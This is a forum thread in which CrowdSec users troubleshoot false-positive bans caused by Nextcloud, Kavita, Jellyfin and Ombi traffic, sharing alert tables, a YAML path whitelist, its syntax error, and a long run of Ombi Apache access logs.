False positives occurring with Nextcloud and eBook reader Kavita

I have CrowdSec running in front of a Nextcloud instance, and if one of my users attempts to sync files using the Nextcloud desktop client, they will usually get themselves banned. Similar things happen when a user is turning pages in a book on Kavita.

I’m pretty new to CrowdSec, so I’m not sure what information would be helpful here, but here are the relevant alerts for Nextcloud:

| 455 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:12:16.780727354  |
| 454 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:12:02.230303367  |
| 453 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:05:46.160224937  |
| 452 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:04:16.460203323  |
| 451 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 15:00:55.198849852  |
| 450 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:58:45.905619787  |
| 449 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:53:49.400745564  |
| 448 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:53:14.750015725  |
| 447 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:51:22.467476162  |
| 446 | Ip:X.X.X.X           | crowdsecurity/http-probing           | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:38:03.256405305  |
| 445 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:38:58.110206824  |
| 444 | Ip:X.X.X.X           | crowdsecurity/http-probing           | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:21:51.721533815  |
| 443 | Ip:X.X.X.X           | crowdsecurity/http-crawl-non_statics | US      |  Time Warner Cable Internet    | ban:1     | 2021-10-31 14:21:08.864634398  |

Please let me know if I can provide any other information that would help.

Hi there,

Got more or less the same issue.
Installed crowdsec on my Nextcloud server and got banned at my first login attempt.

# cscli decisions list
+-------+----------+-----------------+--------------------------------------+--------+---------+---------+--------+--------------------+----------+
|  ID   |  SOURCE  |   SCOPE:VALUE   |                REASON                | ACTION | COUNTRY |   AS    | EVENTS |     EXPIRATION     | ALERT ID |
+-------+----------+-----------------+--------------------------------------+--------+---------+---------+--------+--------------------+----------+
| 43984 | crowdsec | Ip:x.x.x.x| crowdsecurity/http-crawl-non_statics | ban    | FR      |  Orange |     47 | 1h57m54.664254699s |       62 |
+-------+----------+-----------------+--------------------------------------+--------+---------+---------+--------+--------------------+----------+

Then took a look at the http-crawl-non_statics scenario :

https://hub.crowdsec.net/author/crowdsecurity/configurations/http-crawl-non_statics

Thus, it is just about high-rate requests on non-static resources.
Unfortunately, the Nextcloud browser-side code is known to generate a lot of requests (which tends to offer poor user experience).

However, quickly parsed my Apache logs :

cat drive.access.log | cut -d' ' -f8 | cut -d'/' -f-4 | sort | uniq -c
...
      1 /index.php/js/core
      3 /index.php/login
      1 /index.php/svg/activity
      1 /index.php/svg/circles
     43 /index.php/svg/contacts
    187 /index.php/svg/core
      2 /index.php/svg/deck
      8 /index.php/svg/files
...

Hummm, looks like multiple requests to /index.php/svg are the root cause.

Then, took a look at :

https://discourse.crowdsec.net/t/help-with-whitelist-rules-expression-with-portion-of-url/41

but due to some syntax errors with usage of ‘expression’ in the yaml config file, had to adjust based on :

https://github.com/antonmedv/expr/blob/master/docs/Language-Definition.md

So, finally, I ended up creating the following whitelist file :

vi /etc/crowdsec/parsers/s02-enrich/mynextcloudwhitelist.yaml
name: crowdsecurity/mynextcloudwhitelist
description: "Whitelist events from nextcloud legitimate access"
whitelist:
  reason: "ignore index.php/svg"
  expression:
    - evt.Parsed.request contains "'/index.php/svg/'"

Then :

systemctl restart crowdsec

Removed the false-positive decision :

cscli decisions delete --id 43984

Job done (it looks).

Please, consider this as a candidate workaround ; not a perfect fix.

Regards.


Hello,

Thanks for looking into it !
If either of you would be able to provide more logs of what is going on, we might be able to come up with an improved whitelist (hopefully).

On the side @caramb, can you tell me more on the issue you faced with :


Hello Thibault,

Regarding the syntax error issue, the post suggests to use the following :

name: my-custom-whitelist
description: my custom whitelists
whitelist:
  reason: do not ban jellyfin users
  expression:
     - "'/jellyfin' in evt.Parsed.request"

So tried :

name: crowdsecurity/mynextcloudwhitelist
description: "Whitelist events from nextcloud legitimate access"
whitelist:
  reason: "ignore index.php/svg"
  expression:
    - "'/index.php/svg/' in evt.Parsed.request"

But this causes a syntax error :

-- L'unité (unit) crowdsec.service a commencé à démarrer.
nov. 08 13:08:30 nextcloud crowdsec[17901]: time="08-11-2021 13:08:30" level=fatal msg="Unable to compile whitelist expression ''/index.php/svg/' in evt.Parsed.request' : invalid operation: in (mismatched types string and string) (1:19)\
nov. 08 13:08:30 nextcloud systemd[1]: crowdsec.service: Control process exited, code=exited, status=1/FAILURE

This is the reason why I replaced

"'/index.php/svg/' in evt.Parsed.request"

with

evt.Parsed.request contains "'/index.php/svg/'"

Regards.

What logs are you looking for? I’m not sure where to find them in the Docker container.

It would be the logs of the webservice itself, you might be able to get them directly from docker logs -n XXXX of the container running the nextcloud service.

I’m having the same issue, but for file-syncing activity. I have modified the whitelist rule posted here. I am a little concerned about ignoring solely based on the path.
Does anyone know if traefik logs specify that a request sent to Nextcloud is authenticated? If so, what would I add to the whitelist rule to make sure only authenticated users are ignored, or would it be better to ignore successful accesses?

EDIT:
Would something like - evt.Parsed.status matches "2.*" added under expression work?

@thibault
I’m also having issues with false positives.
Is there documentation or a guide on how to deal with them?
Is it recommended to add the domain paths causing issues to a whitelist file as mentioned here?
How do I submit logs for improving whitelists? Post them here?
Apps I had issues with: Jellyfin and Ombi

So here are the Apache logs of me accessing the page /ombi/discover/actor/15140.
As soon as I access any actor's page, I get banned.

xx.xxx.xx.xxx - - [07/Aug/2022:23:02:15 +0200] "GET /ombi/hubs/notification?id=06iztfAE8sxxxxxxCxSKsA&access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWxxxxxxxxxxQWRtaW4iLCJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1laWxxxxxxxxxxciI6IjQwNjIzMmQ0LWRmZDEtNGZjNS1hNjJmLWQ3MTM0OGMwZjEyMSIsImh0dHA6Ly9zY2hlbWFzLnhtbHNvYXAub3JnL3dzLzIwMDUvMDUvaWRlbnRpdHkvY2xhaW1zL25hbWUiOiJyaWNoQWRtaW4iLCJqdGkiOiI4NWMwYxxxxxxxxxx0LTRhNzYtYjJiNy00MzU5YjFkN2FmMWUiLCJJZCI6IjQwNjIxxxxxxxxxxDEtNGZjNS1hNjJmLWQ3MTM0OGMwZjEyMSIsInJvbGUiOiJBZG1pbiIsImV4cCI6MTY5MTQ0MDc4MCwiaXNzIjoiT21iaSIsImF1ZCI6Ik9tYmkifQ.2b_Kths49NXsrkmKkdA0JCFzm37YKtyqG_RrHd7ka8w HTTP/1.1" 200 1038 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/discover/actor/15140 HTTP/1.1" 200 4814 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/styles.fb4607be8fcaa2ac.css HTTP/1.1" 200 11048 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v2/Features/ HTTP/1.1" 200 889 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Settings/customization HTTP/1.1" 200 1109 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Identity/accesstoken HTTP/1.1" 200 315 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/translations/en.json?v=398156668 HTTP/1.1" 200 20289 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Identity/ HTTP/1.1" 200 1516 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Settings/issuesenabled HTTP/1.1" 200 285 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "POST /ombi/hubs/notification/negotiate HTTP/1.1" 200 643 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Settings/voteenabled HTTP/1.1" 200 849 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Request/movie/remaining HTTP/1.1" 200 373 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Request/music/remaining HTTP/1.1" 200 937 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v1/Request/tv/remaining HTTP/1.1" 200 373 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v2/search/actor/15140/movie HTTP/1.1" 200 63865 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:25 +0200] "GET /ombi/api/v2/search/actor/15140/tv HTTP/1.1" 200 8748 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/1721 HTTP/1.1" 200 37036 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/10295 HTTP/1.1" 200 38468 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/4391 HTTP/1.1" 200 19304 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/10915 HTTP/1.1" 200 42532 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11175 HTTP/1.1" 200 41049 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11496 HTTP/1.1" 200 38297 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/6399 HTTP/1.1" 200 39833 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11539 HTTP/1.1" 200 36832 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11616 HTTP/1.1" 200 39416 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/6916 HTTP/1.1" 200 41794 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11681 HTTP/1.1" 200 38675 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11689 HTTP/1.1" 200 42020 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/8833 HTTP/1.1" 200 36692 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11829 HTTP/1.1" 200 36787 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9287 HTTP/1.1" 200 40504 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9031 HTTP/1.1" 200 36940 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9394 HTTP/1.1" 200 36838 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/12529 HTTP/1.1" 200 36251 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9474 HTTP/1.1" 200 39978 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/41608 HTTP/1.1" 200 38405 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/46436 HTTP/1.1" 200 26679 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/44699 HTTP/1.1" 200 37458 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/46446 HTTP/1.1" 200 18043 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/46443 HTTP/1.1" 200 35997 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/39807 HTTP/1.1" 200 24578 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11367 HTTP/1.1" 200 37948 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11333 HTTP/1.1" 200 37861 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/52721 HTTP/1.1" 200 37175 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/54149 HTTP/1.1" 200 16558 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/54166 HTTP/1.1" 200 20540 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/54164 HTTP/1.1" 200 37551 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/55093 HTTP/1.1" 200 33558 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/107527 HTTP/1.1" 200 20802 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/269281 HTTP/1.1" 200 19135 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/126813 HTTP/1.1" 200 20019 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/385614 HTTP/1.1" 200 23113 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/328765 HTTP/1.1" 200 16924 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/239211 HTTP/1.1" 200 18673 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/100081 HTTP/1.1" 200 22731 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/271792 HTTP/1.1" 200 19440 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/598050 HTTP/1.1" 200 15569 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/11874 HTTP/1.1" 200 36411 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/61937 HTTP/1.1" 200 20827 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/214007 HTTP/1.1" 200 17472 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/46568 HTTP/1.1" 200 23463 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/346566 HTTP/1.1" 200 15324 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/25388 HTTP/1.1" 200 39250 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/351746 HTTP/1.1" 200 25430 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/212795 HTTP/1.1" 200 19519 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/251850 HTTP/1.1" 200 16579 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/439853 HTTP/1.1" 200 15381 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/429710 HTTP/1.1" 200 18751 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/206639 HTTP/1.1" 200 22580 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464271 HTTP/1.1" 200 2250 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464267 HTTP/1.1" 200 16151 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464263 HTTP/1.1" 200 19183 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464265 HTTP/1.1" 200 18784 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/731170 HTTP/1.1" 200 16931 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/564191 HTTP/1.1" 200 14743 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/430082 HTTP/1.1" 200 15439 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
